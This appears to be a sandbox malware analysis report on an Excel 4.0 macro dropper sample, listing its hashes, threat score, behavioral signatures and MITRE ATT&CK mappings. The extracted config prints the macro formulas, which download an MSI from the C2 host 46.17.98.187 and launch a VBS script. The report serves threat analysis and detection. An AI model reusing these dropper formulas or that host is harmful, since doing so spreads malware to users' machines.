General

  • Target

    f9c430c306834c158889f954dee30533_JaffaCakes118

  • Size

    6KB

  • Sample

    240419-hv1xqscd4y

  • MD5

    f9c430c306834c158889f954dee30533

  • SHA1

    036901f031a0085cf830b5fe180702a1c1c3529b

  • SHA256

    46651237585bcaacebcf2d327cd1686a4395ea481875eb2d79f5435067c34c82

  • SHA512

    82c7fd8c02993cc01826dcacb20e417cb14b6f779e07412b3caff8c9f5f249efc48688535ff8682b9192f82a642c2c2af17605df260a5b4e0bab434726436cb8

  • SSDEEP

    192:NDShuSZ1aEOmmfRy8UhHFBFYucb98yzKM9Y:N2uUwA1FYhb98yzKuY

Score
10/10 (xlm)

Malware Config

Extracted

  • Rule

    Excel 4.0 XLM Macro

  • C2

    http://46.17.98.187

  • Attributes (formulas)

    =EXEC("msiexec.exe")
    =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187","C:\ProgramData\uluculus.msi",0,0)
    =EXEC("wscript C:\ProgramData\start.vbs")
    =HALT()

Extracted

  • Language

    xlm4.0

  • Source

    xlm40.dropper

  • URLs

    http://46.17.98.187

Targets

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Process spawned suspicious child process

      This child process is typically not spawned unless (for example) the parent process crashes. This typically indicates the parent process was unsuccessfully compromised.

MITRE ATT&CK Matrix (ATT&CK v13)

  • Defense Evasion

    Modify Registry (T1112): 1

  • Discovery

    Query Registry (T1012): 2

    System Information Discovery (T1082): 2

Tasks